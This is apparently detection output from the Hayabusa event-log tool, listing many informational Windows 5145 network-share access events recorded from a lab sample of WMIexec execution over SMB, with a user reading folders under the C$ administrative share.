10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.447 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 